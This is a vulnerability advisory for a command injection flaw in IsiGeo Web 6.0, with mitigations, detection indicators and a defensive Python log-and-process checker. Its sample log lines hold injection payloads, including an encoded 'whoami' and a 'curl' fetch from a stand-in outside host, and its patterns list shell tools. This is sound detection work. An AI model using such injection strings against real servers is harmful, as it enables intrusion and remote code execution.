CVE-2023-23564

8.8 HIGH

📋 TL;DR

CVE-2023-23564 is a command injection vulnerability in Geomatika IsiGeo Web 6.0 that allows an authenticated remote attacker to execute arbitrary operating-system commands on the server hosting the application. Organizations that run IsiGeo Web for geospatial data management are affected. The injected commands run with the privileges of the web application process, so a successful attacker can take control of the host.

💻 Affected Systems

Products:
  • Geomatika IsiGeo Web
Versions: 6.0
Operating Systems: Windows, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Exploitation requires an authenticated account, but no non-default configuration is needed: every deployment of version 6.0 is affected.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete compromise of the IsiGeo Web host, leading to theft of the geospatial data it holds, ransomware deployment, lateral movement from the server into the rest of the network, and installation of a persistent backdoor.

🟠 Likely Case

Unauthorized command execution by a compromised or malicious account, leading to data exfiltration, service disruption, and privilege escalation from the web application account to full control of the host.

🟢 If Mitigated

Network segmentation and egress filtering limit what a foothold can reach, but they do not close the injection: any authenticated user can still execute commands in the context of the application process.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Proof-of-concept exploit code is publicly available. Exploitation requires valid application credentials; once authenticated, it is straightforward (low complexity), so every account that can log in is an exploitation path.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://www.geomatika.fr/isigeo-web/

Restart Required: Not applicable (no patch identified)

Instructions:

No official patch information is available at this time. Check the vendor website for security updates and ask Geomatika support whether a fixed build of IsiGeo Web exists; until then, rely on the workarounds below.

🔧 Temporary Workarounds

Input Validation and Sanitization (all platforms)

The application code belongs to the vendor, so operators cannot fix the injection point itself. Filter requests in front of the application instead (reverse proxy or WAF): reject parameter values that, after URL decoding, contain shell metacharacters (; | ` $( && and encoded newlines) or shell command names. Expect some tuning against legitimate geospatial queries. This reduces exposure but is a filter, not a fix.

Network Segmentation (all platforms)

Isolate IsiGeo Web servers from critical systems and restrict outbound connections from the server to only what the application needs. A command-injection foothold that cannot reach the internet or internal management networks is far harder to turn into data exfiltration or lateral movement.

🧯 If You Can't Patch

  • Restrict who can reach the IsiGeo Web interface (source-network allow-lists, VPN-only access) and prune unused accounts, since every valid account is an exploitation path
  • Monitor for shells spawned by the web server or application process and for unusual command execution, and put an application-level firewall in front of the interface

🔍 How to Verify

Check if Vulnerable:

Any IsiGeo Web 6.0 installation is vulnerable, so the version check alone answers this question. Reviewing application and web-server logs for command injection attempts tells you whether someone has already tried to exploit it, not whether you are exposed.

Check Version:

Check application interface or configuration files for version information

Verify Fix Applied:

Re-run the public PoC against a non-production instance after applying mitigations and confirm that the injected command does not execute (no shell spawned by the web server process, no outbound connection from the payload). A filter that only blocks the PoC's exact payload is not sufficient; vary the metacharacters and their encoding.

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution patterns
  • Multiple failed authentication attempts followed by successful login and command execution
  • Shell or system processes (sh, bash, cmd.exe, powershell) spawned as children of the web server or application process

Network Indicators:

  • Outbound connections from IsiGeo Web server to unusual destinations
  • Unexpected network traffic patterns from application server

SIEM Query (illustrative; the application's own logs are unlikely to carry a command field, so adapt the source and field names to your pipeline, and prefer process-creation telemetry from EDR, Sysmon or auditd where the parent of a shell is the web server process):

source="isigeo-web" AND (command="cmd.exe" OR command="/bin/bash" OR command="powershell")
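The log and process indicators above can be checked mechanically. The following is an added Python example, not from this page and not from Geomatika: it runs both checks over constructed sample data. The access-log layout (Apache/nginx combined format), the /isigeo-web/ request paths, the parent process names and the host names are all assumptions, because the page does not identify the vulnerable endpoint or the server stack IsiGeo Web runs on.

```python
"""Detection checks for the indicators above, run over constructed sample data.
Formats, paths, host and process names are assumptions (see lead-in)."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx "combined" access-log layout (assumed; adapt to your server).
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters a geospatial parameter never needs. Checked after URL
# decoding, so %3b (;) and %0a (newline) are caught as well as literal forms.
META_RE = re.compile(r'[;|`\n]|\$\(|&&|\|\|')
# Command names matching the indicators listed on the page.
CMD_RE = re.compile(
    r'\b(cmd(\.exe)?|powershell|pwsh|/bin/(ba)?sh|bash|whoami|curl|wget|certutil)\b',
    re.IGNORECASE,
)

# Constructed access-log lines: two benign requests and two injection attempts
# by the same authenticated account from an external address.
SAMPLE_ACCESS_LOG = [
    '10.0.8.21 - alice [12/Mar/2023:09:14:02 +0000] '
    '"GET /isigeo-web/layers?layer=parcels&bbox=2.3,48.8,2.4,48.9 HTTP/1.1" 200 5120',
    '203.0.113.45 - alice [12/Mar/2023:09:21:17 +0000] '
    '"GET /isigeo-web/export?format=shp%3Bwhoami HTTP/1.1" 200 88',
    '203.0.113.45 - alice [12/Mar/2023:09:21:40 +0000] '
    '"POST /isigeo-web/export?name=a%0acurl%20http://203.0.113.9/x HTTP/1.1" 500 0',
    '10.0.8.22 - bob [12/Mar/2023:09:30:00 +0000] '
    '"GET /isigeo-web/search?q=rue+de+la+paix&page=2 HTTP/1.1" 200 2048',
]

# Constructed process-creation events (Sysmon event 1 / auditd execve,
# normalised to these keys). Parent names cover common web stacks because the
# page does not say which one IsiGeo Web uses.
SAMPLE_PROCESS_EVENTS = [
    {'host': 'gis-web-01', 'parent_image': '/usr/sbin/apache2',
     'image': '/usr/bin/php-cgi', 'cmdline': 'php-cgi'},
    {'host': 'gis-web-01', 'parent_image': '/usr/sbin/apache2',
     'image': '/bin/sh', 'cmdline': 'sh -c whoami'},
    {'host': 'gis-web-02', 'parent_image': r'C:\Windows\System32\inetsrv\w3wp.exe',
     'image': r'C:\Windows\System32\cmd.exe', 'cmdline': 'cmd.exe /c whoami'},
    {'host': 'gis-web-02', 'parent_image': r'C:\Windows\explorer.exe',
     'image': r'C:\Windows\System32\cmd.exe', 'cmdline': 'cmd.exe'},
]

WEB_PARENTS = {'httpd', 'apache2', 'nginx', 'php-fpm', 'php-cgi', 'w3wp.exe', 'java', 'tomcat'}
SHELLS = {'sh', 'bash', 'dash', 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'pwsh'}


def suspicious_requests(lines):
    """Return (ip, user, target, reasons) for requests whose decoded path or
    query values contain shell metacharacters or shell command names."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than crash
        target = m.group('target')
        parts = urlsplit(target)
        # Decode each value on its own so the '&' query separator is never
        # mistaken for a shell operator.
        values = [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
        values.append(unquote(parts.path))
        reasons = set()
        for v in values:
            if META_RE.search(v):
                reasons.add('shell-metachar')
            if CMD_RE.search(v):
                reasons.add('shell-binary')
        if reasons:
            hits.append((m.group('ip'), m.group('user'), target, sorted(reasons)))
    return hits


def _basename(path):
    """Last path component for both '/' and '\\' separated paths."""
    return re.split(r'[\\/]', path)[-1].lower()


def shell_from_web_context(events):
    """Return (host, parent, child, cmdline) for shells whose parent is a web
    server or application runtime: the most reliable indicator, because it
    does not depend on how the payload was encoded."""
    flagged = []
    for e in events:
        parent, child = _basename(e['parent_image']), _basename(e['image'])
        if parent in WEB_PARENTS and child in SHELLS:
            flagged.append((e['host'], parent, child, e.get('cmdline', '')))
    return flagged


if __name__ == '__main__':
    for hit in suspicious_requests(SAMPLE_ACCESS_LOG):
        print('request:', hit)
    for hit in shell_from_web_context(SAMPLE_PROCESS_EVENTS):
        print('process:', hit)
```

On the constructed data the request check flags only the two requests from 203.0.113.45 (the literal & in bob's query does not fire, the encoded ; and newline do), and the process check flags the sh child of apache2 and the cmd.exe child of w3wp.exe but not cmd.exe launched from explorer.exe. The process check is the one to rely on: it sees the outcome of the injection whatever encoding the attacker used, and maps directly onto Sysmon event 1 or auditd execve records once the fields are normalised to the keys used here.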
